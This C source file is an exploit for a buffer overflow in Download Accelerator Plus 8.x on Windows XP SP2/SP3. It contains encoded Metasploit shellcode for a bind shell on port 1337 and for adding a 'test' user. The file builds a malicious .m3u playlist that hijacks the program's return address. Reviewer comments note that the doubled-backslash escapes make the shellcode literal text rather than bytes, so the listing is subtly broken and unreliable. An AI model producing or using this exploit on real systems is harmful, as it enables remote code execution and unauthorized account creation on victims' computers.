#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
SecurityFocus Advisory:
Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute
arbitrary code in the context of the application. Failed exploit attempts
will cause denial-of-service conditions.
Vulnerability discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Original POC by h07 http://www.milw0rm.com/exploits/6030
This PoC will create a "special" .m3u file that, when imported in DAP and then checked with
the Verify button, will cause a buffer overflow and lead to exploitation. Run the program
with no args for usage info or just look in the code. 😛
Tested on Windows XP English SP2 & SP3 only: the return addresses below point into the
msvcp60.dll builds shipped with those service packs and will not work unchanged elsewhere.
C Exploit code by Shinnok raydenxy [at] yahoo dot com
*/
/* win32_bind – EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com */
/*
 * Payload 0: Metasploit win32_bind (LPORT=1337, EXITFUNC=seh), PexAlphaNum
 * encoded, 709 bytes per the generator banner above. After the short decoder
 * stub the encoded body is printable, and no \x00 byte is visible in the
 * listing, so the array can be emitted as a C string (it is NUL-terminated
 * by the string-literal initializer).
 *
 * NOTE(review): every escape in this listing is rendered as "\\x.." (doubled
 * backslash). Compiled as written, that is the literal text "\x..", not the
 * byte 0x..; check the bytes against the original before relying on them.
 */
unsigned char bind_scode[] =
"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"
"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"
"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"
"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"
"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x46\\x4b\\x4e"
"\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x36\\x4b\\x58"
"\\x4e\\x36\\x46\\x32\\x46\\x52\\x4b\\x48\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x57"
"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x51\\x4b\\x48"
"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x33\\x4b\\x38"
"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c"
"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e"
"\\x46\\x4f\\x4b\\x33\\x46\\x45\\x46\\x52\\x4a\\x42\\x45\\x57\\x45\\x4e\\x4b\\x58"
"\\x4f\\x55\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x38\\x4e\\x30\\x4b\\x44"
"\\x4b\\x48\\x4f\\x55\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x52\\x4b\\x48"
"\\x49\\x38\\x4e\\x36\\x46\\x32\\x4e\\x51\\x41\\x36\\x43\\x4c\\x41\\x33\\x4b\\x4d"
"\\x46\\x36\\x4b\\x38\\x43\\x54\\x42\\x53\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58"
"\\x42\\x47\\x4e\\x51\\x4d\\x4a\\x4b\\x58\\x42\\x34\\x4a\\x50\\x50\\x55\\x4a\\x36"
"\\x50\\x58\\x50\\x34\\x50\\x50\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x56"
"\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x53\\x44\\x33\\x4a\\x46\\x47\\x37\\x43\\x47"
"\\x44\\x53\\x4f\\x55\\x46\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4b\\x4c\\x4d\\x4e"
"\\x4e\\x4f\\x4b\\x53\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x4f\\x55\\x49\\x48\\x45\\x4e"
"\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x35\\x4c\\x36\\x44\\x50"
"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55"
"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x55\\x43\\x45\\x43\\x35\\x43\\x55\\x43\\x44"
"\\x43\\x45\\x43\\x34\\x43\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4a\\x36\\x45\\x50"
"\\x49\\x43\\x48\\x56\\x43\\x45\\x49\\x58\\x41\\x4e\\x45\\x49\\x4a\\x56\\x46\\x4a"
"\\x4c\\x31\\x42\\x37\\x47\\x4c\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31"
"\\x41\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42"
"\\x49\\x4e\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x45\\x45\\x4f\\x4f\\x42\\x4d"
"\\x4a\\x36\\x45\\x4e\\x49\\x34\\x48\\x48\\x49\\x44\\x47\\x55\\x4f\\x4f\\x48\\x4d"
"\\x42\\x55\\x46\\x55\\x46\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x39\\x4a\\x56"
"\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x45\\x45"
"\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x46\\x46\\x46\\x48\\x56\\x4a\\x46\\x43\\x46"
"\\x4d\\x46\\x49\\x38\\x45\\x4e\\x4c\\x36\\x42\\x35\\x49\\x55\\x49\\x42\\x4e\\x4c"
"\\x49\\x58\\x47\\x4e\\x4c\\x46\\x46\\x54\\x49\\x58\\x44\\x4e\\x41\\x53\\x42\\x4c"
"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x42\\x50\\x4f\\x44\\x34\\x4e\\x42"
"\\x43\\x59\\x4d\\x48\\x4c\\x37\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x56"
"\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x44\\x4f\\x4f"
"\\x48\\x4d\\x4b\\x45\\x47\\x55\\x44\\x55\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46"
"\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x55\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36"
"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46"
"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x58\\x47\\x35\\x4e\\x4f"
"\\x43\\x58\\x46\\x4c\\x46\\x46\\x4f\\x4f\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d"
"\\x4a\\x56\\x42\\x4f\\x4c\\x58\\x46\\x30\\x4f\\x55\\x43\\x35\\x4f\\x4f\\x48\\x4d"
"\\x4f\\x4f\\x42\\x4d\\x5a";
/* win32_adduser – PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com */
/*
 * Payload 1: Metasploit win32_adduser (USER=test, PASS=test, EXITFUNC=seh),
 * PexAlphaNum encoded, 489 bytes per the generator banner above. Same layout
 * as bind_scode: decoder stub followed by a printable body with no \x00 byte
 * visible in the listing, NUL-terminated by the string-literal initializer.
 *
 * The credentials are hard-coded in the shellcode; whether the account ends up
 * in the Administrators group is not determined by anything in this file
 * (the usage text says "admin user" -- verify against the Metasploit module).
 *
 * NOTE(review): the escapes are rendered as "\\x.." (doubled backslash) in
 * this listing; as written they would be literal text, not bytes. Verify.
 */
unsigned char user_scode[] =
"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"
"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"
"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"
"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"
"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34"
"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x33\\x4b\\x58\\x4e\\x57"
"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x31\\x4b\\x58"
"\\x4f\\x35\\x42\\x52\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48"
"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c"
"\\x46\\x47\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e"
"\\x46\\x4f\\x4b\\x33\\x46\\x45\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48"
"\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x50\\x4b\\x54"
"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x41\\x4b\\x58"
"\\x41\\x30\\x4b\\x4e\\x49\\x48\\x4e\\x35\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43"
"\\x42\\x4c\\x46\\x46\\x4b\\x58\\x42\\x34\\x42\\x43\\x45\\x38\\x42\\x4c\\x4a\\x47"
"\\x4e\\x30\\x4b\\x58\\x42\\x44\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a"
"\\x4b\\x48\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b"
"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x48\\x4a\\x36\\x4e\\x53\\x4f\\x55\\x41\\x43"
"\\x48\\x4f\\x42\\x36\\x48\\x45\\x49\\x58\\x4a\\x4f\\x43\\x38\\x42\\x4c\\x4b\\x47"
"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x30\\x4f\\x45\\x4a\\x36\\x4a\\x39"
"\\x50\\x4f\\x4c\\x38\\x50\\x30\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x4d\\x46"
"\\x46\\x46\\x50\\x42\\x45\\x56\\x4a\\x47\\x45\\x46\\x42\\x52\\x4f\\x52\\x43\\x36"
"\\x42\\x32\\x50\\x46\\x45\\x46\\x46\\x57\\x42\\x52\\x45\\x47\\x43\\x37\\x45\\x36"
"\\x44\\x37\\x42\\x32\\x46\\x37\\x45\\x36\\x43\\x47\\x46\\x37\\x42\\x42\\x46\\x37"
"\\x45\\x36\\x43\\x37\\x46\\x37\\x42\\x52\\x4f\\x52\\x41\\x44\\x46\\x54\\x46\\x44"
"\\x42\\x52\\x48\\x42\\x48\\x32\\x42\\x32\\x50\\x36\\x45\\x56\\x46\\x57\\x42\\x42"
"\\x4e\\x36\\x4f\\x36\\x43\\x56\\x41\\x36\\x4e\\x56\\x47\\x46\\x44\\x37\\x4f\\x36"
"\\x45\\x37\\x42\\x37\\x42\\x42\\x41\\x34\\x46\\x46\\x4d\\x56\\x49\\x56\\x50\\x46"
"\\x49\\x56\\x43\\x57\\x46\\x37\\x44\\x37\\x41\\x56\\x46\\x47\\x4f\\x56\\x44\\x37"
"\\x43\\x57\\x42\\x52\\x46\\x47\\x45\\x56\\x43\\x37\\x46\\x47\\x42\\x32\\x4f\\x52"
"\\x41\\x34\\x46\\x34\\x46\\x34\\x42\\x30\\x5a";
/*
 * Return address written over the saved EIP, selected by target service pack.
 * Read little-endian as written: SP2 -> 0x7608bccf, SP3 -> 0x7608bce1, both
 * inside msvcp60.dll per the original comments. Presumably each is a
 * trampoline back into the 30-byte NOP pad that follows in the file (not
 * confirmed here). Four bytes, no NUL, so the original's "%s" copies all of
 * them.
 *
 * NOTE(review): the escapes appear doubled ("\\x") in this listing; verify
 * the bytes before use.
 */
unsigned char ra_sp2[] = "\\xcf\\xbc\\x08\\x76"; //msvcp60.dll
unsigned char ra_sp3[] = "\\xe1\\xbc\\x08\\x76"; //msvcp60.dll
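/*
 * NOP sleds (0x90 fill) that pad the .m3u line before and after the return
 * address: 14115 bytes ahead of it, 30 bytes behind it.
 *
 * The original declared exactly 14115 / 30 elements and then stored a NUL
 * terminator at index 14115 / 30 -- one past the end -- so it could print the
 * sleds with "%s". That is an out-of-bounds write (undefined behaviour).
 * Reserve one extra element so a terminator after the fill stays in bounds.
 * The fill lengths themselves are unchanged; the file layout is not affected.
 */
unsigned char nops1[14115 + 1]; /* 14115 * 0x90, room for a trailing '\0' */
unsigned char nops2[30 + 1];    /* 30 * 0x90, room for a trailing '\0' */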
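/*
 * Return 0 or 1 when `s` is exactly "0" or "1", otherwise -1.
 * The original used atoi(), which maps any non-numeric string to 0 and so
 * silently accepted e.g. "sp2" as the SP2 target.
 */
static int parse_flag(const char *s)
{
    if (strcmp(s, "0") == 0) {
        return 0;
    }
    if (strcmp(s, "1") == 0) {
        return 1;
    }
    return -1;
}

/* Write exactly `len` bytes from `p` to `f`; 0 on success, -1 on a short write. */
static int write_all(FILE *f, const void *p, size_t len)
{
    return fwrite(p, 1, len, f) == len ? 0 : -1;
}

/*
 * Build sploit.m3u in the current directory.
 *
 * argv[1] selects the return address (0 = XP SP2, 1 = XP SP3) and argv[2]
 * the payload (0 = bind shell on TCP/1337, 1 = add user test/test).
 * The single line written has the same layout as the original:
 *   "http://localhost/" + 14115 x 0x90 + ra (4 bytes) + 30 x 0x90 + shellcode
 *   + ".mp3" + CR LF
 *
 * Returns EXIT_SUCCESS after writing the file (and, as the original did,
 * after printing usage), EXIT_FAILURE if the file cannot be written.
 *
 * Changes from the original: arguments are validated exactly instead of via
 * atoi(); fopen()/fwrite()/fclose() failures are reported instead of handing
 * a NULL FILE* to fprintf(); the sleds are emitted by explicit length so no
 * NUL has to be stored one past the end of nops1/nops2; and the loop
 * increments / character escapes that were mangled in the listing are
 * written out in plain C.
 */
int main(int argc, char **argv)
{
    enum { NOP_SLED_LEN = 14115, NOP_PAD_LEN = 30, RA_LEN = 4 };
    static const char outname[] = "sploit.m3u";
    const unsigned char *ra;
    const unsigned char *scode;
    FILE *f;
    int target = -1;
    int payload = -1;
    int ok;

    printf("[ ] Download Accelerator Plus – DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n");
    printf("[ ] Discovered by Krystian Kloskowski (h07) <h07@interia.pl>\n");
    printf("[ ] Code by Shinnok raydenxy[at]yahoo dot com\n");

    if (argc == 3) {
        target = parse_flag(argv[1]);
        payload = parse_flag(argv[2]);
    }
    if (target < 0 || payload < 0) {
        printf("Usage: %s target payload\n", argv[0]);
        printf("Where target is:\n");
        printf("0: WinXP SP2\n");
        printf("1: WinXP SP3\n");
        printf("Where payload is:\n");
        printf("0: bind shell on 1337\n");
        printf("1: add admin user \"test\" with password \"test\"\n");
        return EXIT_SUCCESS;
    }

    /* 0x90 = x86 NOP. Filled and written by length, so no terminator is needed. */
    memset(nops1, 0x90, NOP_SLED_LEN);
    memset(nops2, 0x90, NOP_PAD_LEN);
    ra = target == 0 ? ra_sp2 : ra_sp3;
    scode = payload == 0 ? bind_scode : user_scode;

    /* Binary mode: the CR LF at the end must not be translated on Windows. */
    f = fopen(outname, "wb");
    if (f == NULL) {
        perror(outname);
        return EXIT_FAILURE;
    }

    /* The shellcode arrays are NUL-terminated string literals, so fputs() copies them whole. */
    ok = fputs("http://localhost/", f) != EOF
      && write_all(f, nops1, NOP_SLED_LEN) == 0
      && write_all(f, ra, RA_LEN) == 0
      && write_all(f, nops2, NOP_PAD_LEN) == 0
      && fputs((const char *)scode, f) != EOF
      && fputs(".mp3\r\n", f) != EOF;
    /* fclose() flushes; a failure here is a failed write too. */
    if (fclose(f) != 0) {
        ok = 0;
    }
    if (!ok) {
        perror(outname);
        remove(outname); /* do not leave a truncated file that looks usable */
        return EXIT_FAILURE;
    }

    printf("sploit.m3u created!\n");
    return EXIT_SUCCESS;
}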